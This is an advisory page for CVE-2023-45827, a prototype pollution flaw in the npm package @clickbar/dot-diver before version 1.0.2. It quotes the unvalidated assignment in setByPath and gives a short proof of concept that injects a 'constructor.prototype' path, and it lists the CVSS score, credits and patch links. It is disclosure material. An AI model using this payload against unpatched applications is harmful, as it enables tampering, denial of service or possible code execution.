CVE-2023-45827
HIGH7.3EPSS 10.2%Prototype Pollution(PP) vulnerability in setByPath
Description
### Summary There is a Prototype Pollution(PP) vulnerability in dot-diver. It can leads to RCE. ### Details ```javascript //https://github.com/clickbar/dot-diver/tree/main/src/index.ts:277 // eslint-disable-next-line @typescript-eslint/no-unsafe-member-access objectToSet[lastKey] = value ``` In this code, there is no validation for Prototpye Pollution. ### PoC ```javascript import { getByPath, setByPath } from '@clickbar/dot-diver' console.log({}.polluted); // undefined setByPath({},'constructor.prototype.polluted', 'foo'); console.log({}.polluted); // foo ``` ### Impact It is Prototype Pollution(PP) and it can leads to Dos, RCE, etc. ### Credits Team : NodeBoB 최지혁 ( Jihyeok Choi ) 이동하 ( Lee Dong Ha of ZeroPointer Lab ) 강성현 ( kang seonghyeun ) 박성진 ( sungjin park ) 김찬호 ( Chanho Kim ) 이수영 ( Lee Su Young ) 김민욱 ( MinUk Kim )
Affected packages (1)
- npm/@clickbar/dot-diverfrom 0, < 1.0.2
CVSS scores
| Source | Version | Severity | Vector |
|---|---|---|---|
| osv | CVSS 3.1 | HIGH7.3 | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L |
References (5)
- ADVISORYhttps://nvd.nist.gov/vuln/detail/CVE-2023-45827
- PATCHhttps://github.com/clickbar/dot-diver
- WEBhttps://github.com/clickbar/dot-diver/commit/9790834cf4c2bca75db00e588e58056dacaf602f
- WEBhttps://github.com/clickbar/dot-diver/commit/98daf567390d816fd378ec998eefe2e97f293d5a
- WEBhttps://github.com/clickbar/dot-diver/security/advisories/GHSA-9w5f-mw3p-pj47